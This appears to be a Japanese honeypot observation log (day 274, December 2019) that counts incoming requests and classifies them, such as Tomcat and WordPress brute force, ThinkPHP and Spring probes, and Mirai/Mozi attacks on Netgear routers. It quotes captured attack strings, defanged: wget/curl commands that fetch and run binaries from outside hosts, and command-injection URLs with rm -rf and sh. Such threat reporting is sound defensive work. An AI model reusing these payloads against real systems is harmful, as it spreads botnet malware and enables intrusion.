WOWHoneypot観察(274日目)
2019/12/15(日)
トータルは4189件でした。
ハンティングログは以下です。
149.202.251[.]78 wget hxxp[:]//80.82.64[.]14/richard; curl -O hxxp[:]//80.82.64[.]14/richard |
149.202.251[.]78 curl -O hxxp[:]//80.82.64[.]14/richard |
37.255.67[.]199 wget${IFS}-qO-${IFS}hxxp[:]//104.244.75[.]222/b |
www.virustotal.com
www.virustotal.com
113.220.30[.]96 wget+hxxp[:]//192.168.1[.]1:8088/Mozi.m |
件数 | 概要 | リクエスト |
---|---|---|
4002 | Tomcat管理ページに対するブルートフォース攻撃 | GET /manager/html |
55 | WordPressに対するブルートフォース攻撃 | GET /wp-login.php |
54 | WordPressに対するブルートフォース攻撃 | POST /wp-login.php |
45 | アクセス | GET / |
10 | WordPress の Pingback を狙ったブルートフォース攻撃 | POST /xmlrpc.php |
5 | アクセス | GET /favicon.ico |
2 | DVR/NVR/IPC のAPIにおける脆弱性を狙った通信 | POST /editBlackAndWhiteList |
2 | ThinkPHPの脆弱性を狙った通信 | GET /TP/public/index.php |
1 | ThinkPHPの脆弱性を狙った通信 | POST /TP/public/index.php?s=captcha |
1 | ThinkPHPの脆弱性を狙った通信 | GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 |
1 | Spring Data Commonsの脆弱性を狙った通信 | POST /users?page=&size=5 |
1 | クローリング | HEAD /robots.txt |
1 | サイト構成の調査 | GET /sitemap.xml |
1 | DGN1000 Netgear ルータを狙うMirai亜種の攻撃 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+hxxp[:]//192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 |
1 | DGN1000 Netgear ルータを狙うMirai亜種の攻撃 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox&curpath=/¤tsetting.htm=1 |
1 | クローリング | GET /robots.txt |
1 | Silverlightのドメイン間ポリシーファイルの調査 | GET /clientaccesspolicy.xml |
1 | ルータの脆弱性を狙った通信 | GET /cgi-bin/masterCGI?ping=nomip&user=;wget%20hxxp[:]//80.82.64.14/richard;%20curl%20-O%20hxxp[:]//80.82.64.14/richard;%20chmod%20+x%20richard;%20sh%20richard |
1 | WSManの調査 | GET /WSMAN |
1 | WordPressの調査 | GET ///wp-json/wp/v2/users/ |
1 | WordPressの調査 | GET ///?author=1 |
1 | SSL証明書発行時の一時ファイルの調査 | GET /.well-known/security.txt |